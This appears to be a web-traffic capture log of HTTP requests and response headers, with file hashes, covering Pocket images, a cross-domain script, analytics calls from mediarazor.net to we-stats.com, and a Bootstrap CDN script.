Sha256: e665a8821b5e7b2e78787647a08d629bf70cbf4cbfee2057c8601cf0565154a1
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9723d426-a6ee-4860-8067-0b8d98143233.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8637
x-amzn-requestid: 07dc23e0-000f-4f6c-8d2b-0e65d88be270
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZCSvvEenoAMFr0Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6330cb31-520803124760abc216152d7b;Sampled=0
x-amzn-remapped-date: Sun, 25 Sep 2022 21:42:09 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: HCJ483GPdpPhC7oYm1GrA02BqqST9sfqfCBSA93rZqaQYl-jezgP5Q==
via: 1.1 27a84054de24e45f952ea4056a821764.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Sun, 25 Sep 2022 22:20:40 GMT
age: 57045
etag: "e49306a3713cb724be024a4ddb5e90645718a718"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8637
Md5:    d02ede0c964f3346fd53ae2950bf2a62
Sha1:   e49306a3713cb724be024a4ddb5e90645718a718
Sha256: c0e653d89656016c55aca9b198b9191620f1ae9a3c45742a90744bd74c4f9505
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7838a122-2b2e-4e4c-9bcc-7c6b46a93b1e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11728
x-amzn-requestid: bf60e58f-c4f4-45c7-923b-0d1539f720f5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZCUCGGw7oAMF3wQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6330cd40-32043c1b1411544f5d00edc0;Sampled=0
x-amzn-remapped-date: Sun, 25 Sep 2022 21:50:56 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: H4KXhBaRw3SvzBrbl30mV6R_vJ8bXBkyicb8fQiTp6YSBHjE8iFkNQ==
via: 1.1 26ca01ec7377e425b59b6a08cb1ec342.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Sun, 25 Sep 2022 22:49:56 GMT
etag: "9660bb2d38079182efbd11d7a687bfc7f9d30751"
age: 55289
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11728
Md5:    968b9c138702fb5994d1d9eab1a697fa
Sha1:   9660bb2d38079182efbd11d7a687bfc7f9d30751
Sha256: 5ba74820ad451747c8ed25529f06b037bebf4c0616a1f2165c9197c1171db7a6
                                        
                                            GET /scripts/prod/crossdomain2.12.0.5273.b96c35cc.min.js HTTP/1.1 
Host: 1.a79ab95c1589a13f8a4cab612bc71f9f7.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://1.a79ab95c1589a13f8a4cab612bc71f9f7.com/scripts/prod/crossdomain.html
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         54.230.111.22
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 3227
last-modified: Tue, 13 Oct 2020 12:04:25 GMT
x-amz-version-id: null
accept-ranges: bytes
server: AmazonS3
date: Mon, 26 Sep 2022 11:15:39 GMT
etag: "9ee48a4da9c402e8a23ad085fb71f28f"
x-cache: Hit from cloudfront
via: 1.1 e2f427863e6bdb72ad8bed72b596d81e.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: CrA0NlIdVAIZqDxvmwpXgX_hUtuMC8KMYAQxcb9wVW7oX5r_1Ho6Zw==
age: 10548
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (3227), with no line terminators
Size:   3227
Md5:    9ee48a4da9c402e8a23ad085fb71f28f
Sha1:   f0c59306d6313f9bee02b53ca8903991bd24bfd7
Sha256: 9cdad69a4b967c882c3d8e9cb054e7334b7f8870e96427a5d20ae2d17eff2622
                                        
                                            GET /scripts/prod/crossdomain2.12.0.5273.b96c35cc.min.js HTTP/1.1 
Host: 1.c81358859121583b7adf2ace89cb39f44.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://1.c81358859121583b7adf2ace89cb39f44.com/scripts/prod/crossdomain.html
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         54.230.111.34
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 3227
last-modified: Tue, 13 Oct 2020 12:04:25 GMT
x-amz-version-id: null
accept-ranges: bytes
server: AmazonS3
date: Mon, 26 Sep 2022 00:18:38 GMT
etag: "9ee48a4da9c402e8a23ad085fb71f28f"
x-cache: Hit from cloudfront
via: 1.1 9037b7743a833da13439f0d4e2619b52.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: UDApBByfpWWuVbCSiN69WwOwk-PVBPGL9Tm88k5yi91Hv6IpLlaAkg==
age: 49969
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (3227), with no line terminators
Size:   3227
Md5:    9ee48a4da9c402e8a23ad085fb71f28f
Sha1:   f0c59306d6313f9bee02b53ca8903991bd24bfd7
Sha256: 9cdad69a4b967c882c3d8e9cb054e7334b7f8870e96427a5d20ae2d17eff2622
                                        
                                            POST /client/v3.1/web/wup?cid=attina HTTP/1.1 
Host: wup-1ca8ebd0.us.v2.we-stats.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 2150
Origin: http://mediarazor.net
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         52.141.217.134
HTTP/2 200 OK
content-type: application/json
                                        
content-length: 557
date: Mon, 26 Sep 2022 14:11:25 GMT
server: uvicorn
access-control-allow-origin: *
access-control-allow-credentials: true
cache-control: no-cache, no-store
pragma: no-cache
tail-id: ab0dcf02-f0a3-401b-9c04-342981c5d91d
strict-transport-security: max-age=31536000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (557), with no line terminators
Size:   557
Md5:    0cb7e2f40c2a0c808242f8ab8e5b2639
Sha1:   900074aee7cc97160a3b9b9be71dda2cc05c28bd
Sha256: 9eb498abc4bebbb256b1a423515369bb0dc74d83ddfa65def81c27e295c1bc63
                                        
                                            POST /client/v3.1/web/wup?cid=attina HTTP/1.1 
Host: wup-1ca8ebd0.us.v2.we-stats.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 1054
Origin: http://mediarazor.net
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         52.141.217.134
HTTP/2 200 OK
content-type: application/json
                                        
content-length: 557
date: Mon, 26 Sep 2022 14:11:26 GMT
server: uvicorn
access-control-allow-origin: *
access-control-allow-credentials: true
cache-control: no-cache, no-store
pragma: no-cache
tail-id: 3a34be25-5153-4a34-974c-15e24253a5f3
strict-transport-security: max-age=31536000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (557), with no line terminators
Size:   557
Md5:    7787f6ae0ad16950d44871bb7f97237a
Sha1:   82548508e312698a5f0083ef165b15eeb2885d2d
Sha256: ae1bb634685c0ecbc933abe1b23a2b549c1a62554fad63e971fff02b54759b8b
                                        
                                            POST /api/v1/sendLogs?cid=attina&cdsnum=1664201485376-sjn0000484-bdc718c6-bb43-410e-9fef-908c7b240090&csid=null&ds=js&sdkVer=2.21.1.702.b35a966 HTTP/1.1 
Host: log-1ca8ebd0.us.v2.we-stats.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 1340
Origin: http://mediarazor.net
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         52.238.253.184
HTTP/2 204 No Content
                                        
server: nginx
date: Mon, 26 Sep 2022 14:11:28 GMT
access-control-allow-origin: *
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
X-Firefox-Spdy: h2

                                        
                                            GET /bootstrap/4.1.0/js/bootstrap.min.js HTTP/1.1 
Host: stackpath.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://mediarazor.net
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.11.207
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Mon, 26 Sep 2022 14:11:23 GMT
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
access-control-allow-origin: *
cache-control: public, max-age=31919000
etag: W/"ce6e785579ae4cb555c9de311d1b9271"
last-modified: Mon, 25 Jan 2021 22:04:05 GMT
cdn-cachedat: 08/20/2022 03:07:07
cdn-proxyver: 1.02
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
cdn-edgestorageid: 601
cdn-status: 200
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-requestid: f5b23294ae168f8e716ce8d5038dcdd5
cdn-cache: HIT
cf-cache-status: HIT
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 750c96aaa947fac0-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---